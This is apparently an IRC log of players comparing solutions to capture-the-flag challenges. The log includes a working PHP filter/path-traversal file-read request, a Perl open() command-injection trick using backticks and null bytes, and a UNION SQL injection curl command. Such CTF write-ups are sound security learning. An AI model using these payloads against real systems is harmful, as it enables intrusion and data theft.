net100 — PCAP

<rik_> did net100 require any bruteforcing?
<Ymgve> rik_: yes it required bruteforcing but it can be done locally
<rik_> OHH
<rik_> oh blehh
<rik_> i refused to brute it
<rik_> kept thinking i was missing something
<hopeless> net 100

ppc400 — Broken Marquee

<Ymgve> phiber_: periods
<phiber_> what do you mean periods
<Ymgve> phiber_: looking at one pixel in a marquee, the sequence it will flash in repeats as long as the display shows the same text
<vos> phiber_: if you look at flashing repeat period of every pixel, you'll get 7 values: 0 is like totally random, 1 is an ever-on/off pixel, 45 is this fake one, 223 is this fake one, 330 is the flag :)
<vos> (also 116, 140, 195 are just random repeating noise)
<phiber_> damn
<phiber_> I found the 45 interval
<kushou> Ymgve: hmm, didn't use that method for ppc400, given the "hello world 123", I made assumptions on the font, then tried to match columns of blanks (spaces between letters), got the bottom 3 lines, then found the 2 by hand
<kushou> (assuming line 1 and 8 are all blanks)
<phiber_> DAMN
<vos> phiber_: damn
<phiber_> I totally overlooked the 330 interval
<phiber_> thought it was a zero
<phiber_> fuck
<phiber_> the damn ppc400
<spq_> what was the intended way for solving broken marquee
<spq_> ?
<Ymgve> spq_: finding periods was probably the intended way
<Ymgve> also parsing the image was a big part of the task
<spq_> had that done but no luck with my analyzing stuff after that
<Ymgve> but then vos decided we were all a bunch of jerks for not attempting it so he gave us the data

net400 — GSMd

<aXs> lol
<vos> my two major fuckups: 1) connecting to port 0 actually worked for HTTPZ; 2) uptime of GSMd could be found from /etc/adjtime
<vos> intended way for GSMd was to use TCP timestamp to estimate uptime
<Ymgve> lol the adjtime wasn't supposed to be there?
<aXs> vos: adjtime is quite off compare to the tcp timestamps
<vos> aXs: but still is a pretty good estimate
<vos> :D
<vos> Ymgve: hellman solved it that way :)
<vos> he farmed for different hashes for like an hour
<spq_> vos, was there a way to get the uptime without bf?
<vos> spq_: intended way - TCP timestamp field estimation
<Ymgve> spq_: apparently adjtime got roughly the last reboot time and you could get tcp timestamp information
<vos> spq_: shortcut way: look at /etc/adjtime
<Ymgve> stupid way: look at the number of packets sent over lo0
<phiber_> spq_, nmap worked for me, the uptime was accurante with a ~5 minute error
<phiber_> it reported ~73 days uptime
<phiber_> which was like 15~ min close to the timestamp in /etc/adjtime

web400 — PHPwning

<Xelenonz> for web400
<cyberguru> Web400 author's exploit - getting RCE
<Ymgve> haha lol wtf web400 was supposed to be solved like that?
<Ymgve> I used GlobIterator to browse the file system
<aXs> Ymgve: GET /index.php?action=SplFileObject&param=php%3a//filter/read%3dconvert.base64-encode/resource%3dhttp%3a//localhost/admin.php%3fPHPSESSID%3d../var/www/images/fed2d697dfe09bc58dd785eed9027b06 HTTP/1.1
<cyberguru> Ymgve: you were lucky, that flag file was first in / directory and you could easily get it using glob:///*
<cyberguru> Ymgve: we need to hide flags deeper :D
<Ymgve> I wonder if it is possible in web400 to exploit the fact that you can spawn a SoapServer with a service description under your control, somehow
<phiber_> I spent hours with soapserver and simplexmlelement
<phiber_> trying to do xxe
<tomcr00se> omg why did the PHPSESSID in the get work?
<tomcr00se> for web400, i was convinced PHP removed that
<cyberguru> tomcr00se: it is custom session handler in "Session" class
<tomcr00se> yea but that doesn't include the id
<tomcr00se> use_only_cookies is 1 by default in PHP > 5.3.0
<spq_> cyberguru: btw. was this intended:*
<cyberguru> spq_: nope :)
<spq_> just went through the list of classes existing on my local php installation and found that one which looked good :)
<tomcr00se> you got lucky that it printed the flag first
<spq_> otherwise i would have enumerated the dir
<tomcr00se> how?
<spq_> /A* /B* ...
<tomcr00se> i used DirectoryIterator
<tomcr00se> i still don't understand why PHPSESSID works as a get param
<cyberguru> tomcr00se: but you could read php.ini
<tomcr00se> oh neat, php://filter/read=convert.base64-encode/resource= probably works
<tomcr00se> lol

net300 — HTTPZ

<Ymgve> btw, httpz - why does curl on linux fail with some tls error?
<Ymgve> curl on windows (thru a tunnel) works
<vos> Ymgve: httpz - apache seems not to handle port 0 correctly inside Host header
<vos> intended way for HTTPZ was to patch the stack or write a rewrite rule for iptables :<
<Ymgve> lol
<vos> i thought connect to port 0 won't work :D
<vos> like binding 0 does binding to random
<Ymgve> I did curl on windows -> python tunnel script (since netcat didn't work on port 0 by default) and it magically worked
<aXs> patched netcat then openssl s_client to uses port 0, works fine
<Xelenonz> how did you to solve HTTPZ? :D
<Ymgve> Xelenonz: curl from windows through a tcp tunnel into a linux system (that supports port 0)
<phiber_> I used this for httpz

ppc100 — Trash

<hopeless> so what was the deal with ppc 100
<Ymgve> ppc100 was badly designed
<cyberguru> Ymgve: python "qrcode" module works fine in ppc100
<hopeless> sys.setdefaultencoding("iso-8859-1")
<hopeless> that s needed in pyqrcode
<Ymgve> if anyone else don't want to combat their QR tools, here is the proper zip file stitched together!oYsUzbaY!PfE1pxCOEj6lT6CHiLc20wCwpFsdKL5E53g0LO7kV9w
<mathiasbynens> and to recursively extract that zip: while [ -e *.zip ]; do files=*.zip; for file in $files; do echo "$file"; unzip -q "$file"; rm "$file"; done; done

rev300 — Enchanter

<rik_> how did you guys solve enchanted/
<Ymgve> rik_: it's huffman compression
<rik_> Ymgve, how did you even
<phiber_> after a few hours of tracing and writing pseudocode I recognized it was huffman
<Ymgve> which was much easier than I thought at first, because after a not-too-deep look into the code, I thought it was arithmetic encoding
<Ymgve> and fuck that noise
<rik_> i realized that details was storing the distinct bytes and strength was storing their counts
<rik_> but after that i just gave up
<rik_> because there was too much code O_O
<vos> rik_: personally, i didn't reverse the whole thing. just spotted the frequency table and bit-trash on the output. patched the binary to read freq-table from STDIN and gave it the one from task file. fed it 8x \x00, 8x \x01 and so on and looked what bitstreams it spit out. then when i had all the bit-codes, decoded the original file with a script.
<vos> rik_: my rev300 solution dump
<spq_> btw. enchanter - that one was fun
<spq_> found the freq. table really fast, after some digging, just produced a file with equal char count and looked at the result
<spq_> one could see the patterns very well, scanned that result and produced a pattern -> char list and used it to decompress the original item.enchanted
<Ymgve> I had quite a few problems because the enchanter and I disagreed on which order equal-weighted nodes should be sorted in
<Ymgve> - disenchanter that builds the table itself

ppc300 — Captcha Breaker

<__M__> Was ppc300 supposed to be OCR'd? I noticed there was some public temp directory containing intermediate LaTeX files, one could maybe try to race for those...
<phiber_> uh, I solved it using the latex files
<hopeless> most i talked to used ocr
<hopeless> tesseract t be exact
<pdah> I spent few hours to train tesseract
<__M__> Me too.
<pdah> and same amount of time to wait for the flag
<__M__> Used OCR, but without any training.
<pdah> network was so laggy on that day
<__M__> Tesseract + limited charset + some preprocessing.
<__M__> convert cap.png -background white +repage -bordercolor white -border 50x50 +repage -flatten -fill black -draw "rectangle 30,75 93,168" -flatten -sharpen 1 +matte out.tiff && tesseract out.tiff out config batch.nochop
<cyberguru> __M__: you can write your own captcha solver, because character images are equal every time
<phiber_> ppc300 latex mode
<__M__> hopeless: <- perl/tesseract ppc300
<pdah> I think this is what hopeless asked for:

rev400 — Classic

<phiber_> I solved rev400 with pin and instruction counting
<Ymgve> rev400 was just a simple VM, btw
<Ymgve> also not sure if it was intended but I never could get ida to show the stack when connecting to gdbserver on that task
<phiber_> I used instruction counting to solve it
<phiber_> I didn't even debug it
<Ymgve> phiber_: how what
<phiber_> like this
<Ymgve> oh haha
<Ymgve> side channel attack
<phiber_> yeah
<phiber_> easy and fast

net200 — Jailbreaker

<Xelenonz> So, what the solution for Jailbreak?
<vos> Xelenonz: expected was to download an OTA update package. it's not encrypted
<vos> i wonder how those two heros did it
<vos> did anyone actually jailbreak his atv3g :)
<spq_> ok, last onw i didnt solve: jailbreaker - dafuq? i dont have an apple tv :/
<vos> spq_: apple handles their firmware with extreme care, all encrypted and shit
<vos> but it doesn't encrypt the Over-the-Air updates. they are available for download freely
<Ymgve> was that sarcasm
<spq_> so what was the task?
<vos> spq_: just grab an OTA update package from say and send me any file
<spq_> downloading a file from somewhere and sending to you via mail?
<spq_> oh ^^
<vos> net200: task is to learn about OTA updates :)
<spq_> i thought i have to provide some kind of code also
<tomcr00se> (also if i had a damn appletv here in berkeley i have a jailbreak that'll work, i had my dad plug in into my linux box at home but i was too lazy to port the jailbreak to linux)

ppc200 — Play with me

<hopeless> surprised more people didnt get play with me
<hopeless> here is my code
<Ymgve> well I spent hours wondering why the rules were so obtuse
<Ymgve> then realized that the submit format had the coordinates flipped
<Ymgve> x refers to row not column

web200 — Snake

<LongCatTH> how abour snake?
<LongCatTH> I found LFI, but not a flag :/
<Ymgve> the LFI can also be used to run commands
<spq_> flag was in /
<LongCatTH> ahh
<spq_> evil pwerl :)
<Ymgve> you just have to find a clever way to bypass the "does this file exist" check
<spq_> used `$HTTP_USER_AGENT`| as file :)
<spq_> somehow i was unable to use stuff like | < and > - but i could use dd - so i made a mini shell with pieces from the other .pl files :)
<Ymgve> you could also do something like ../../../../../../bin/ls\0|
<Ymgve> but that didn't really help without the ability to specify parameters
<spq_> mainly perls open() with | at the end
<LongCatTH> still didn't get snake!
<LongCatTH> should I write a file?
<LongCatTH> space seems not allow :x
<spq_> LongCatTH: the file must exist, so e.g. "ls /" does not exist in /usr/bin - so you have to find a way around that, e.g. you create a file with the score upload thingy, that makes the think the file exists but when open'ing, it instead executes part of it (this goes through the shell so backticks are a good example)
<LongCatTH> thx, that's clever 0.0

cry400 — CRYPTONET

<ircc> any writeup for crypto400? what was the idea?
<rik_> hamstad broadcast attack?
<rik_> hastad*
<spq_> crt
<rik_> yeah essentially ^
<spq_> :)
<spq_> + 17th root

web100 — Voting

<LongCatTH> web100 curl -vvv "" -d "vote=1&submit=&id=0x`echo -n '2 and 1=2 union select flag from task.Flag'|xxd -p|tr -d '\n'`"

cry200 — Hashme

<Xelenonz> crypt200 : just has only my trash file
<hopeless> crypto 200

cry300 — Matrix

<phiber_> anyone did crypto300 in python?
<phiber_> I tried but I wasn't getting the right matrix divisions, so in the end I used octave
<rik_> phiber_,
<phiber_> I was using M.inv instead of linalg.inv(), and A*B instead of
<phiber_> maybe it was because of that
<rik_> ah
<rik_> A*B isn't proper matrix multiplication
<spq_> phiber_: (python crypto300 solution)